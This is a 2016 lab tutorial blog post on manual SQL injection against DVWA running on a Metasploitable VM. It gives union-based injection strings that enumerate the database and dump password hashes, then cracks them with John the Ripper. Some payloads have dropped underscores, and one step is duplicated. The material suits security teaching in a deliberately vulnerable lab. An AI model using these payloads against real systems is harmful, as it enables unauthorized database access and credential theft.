SQL Injection Lab PT.1 – Intro/Lab Setup

Sep 23, 2016 04:20 PM
Sep 24, 2016 03:00 AM
636102194136275005.jpg

In this lab, We'll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

  • Let's start from LAB setup ( we will see these steps in detail in future posts) :

Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.

> Check IP address of both devices.

Step-by-step instruction

Step 1:

Open Kali Linux (or BT 5r3)

Step 2:

Open your browser and type http://IP address of

Metasploitable/dvwa/login.php

Step 3:

Login with user name "admin" and password "password"

Step 4:

Click on DVWA Security and set it to low then submit

Step 5:

Click on manual SQL injection

Step 6:

On User ID box type 1 and Submit

(Php select statement: $getid = "SELECT firstname, lastname FROM

users WHERE user_id = '$id'";)

Step 7:

%' or '0'='0

(mysql> SELECT firstname, lastname FROM users WHERE user_id = '%' or

'0'='0';)

Step 8:

Get DB version: %' or 0=0 union select null, version() #

Step 9:

Get DB user: %' or 0=0 union select null, user() #

Step 10:

Get DB user: %' or 0=0 union select null, user() #

Get DB name: %' or 0=0 union select null, database() #

Get Schima information: %' and 1=0 union select null, table_name from

information_schema.tables #

Step 11:

Get user table in Schema information: %' and 1=0 union select null,

tablename from informationschema.tables where table_name like 'user%'#

Get all the columns fields in the information_schema user table: %' and 1=0

union select null, concat(tablename,0x0a,columnname) from

informationschema.columns where tablename = 'users' #

Step 12:

Let's get password authentication hash: %' and 1=0 union select null,

concat(firstname,0x0a,lastname,0x0a,user,0x0a,password) from users #

Now copy all the hash file in a notepad as below format

E.g. user:password

Save it to /pentest/passwords/john by name dvwa_password.txt

Open a console and go to /pentest/passwords/john

cd /pentest/passwords/john

. now lunch john the ripper

./john –format=raw-MD5 dvwa_password.txt and hit enter.

(You will get the passwords)

….Ok Gurkhas, we'll continue this in next part.

Comments

No Comments Exist

Be the first, drop a comment!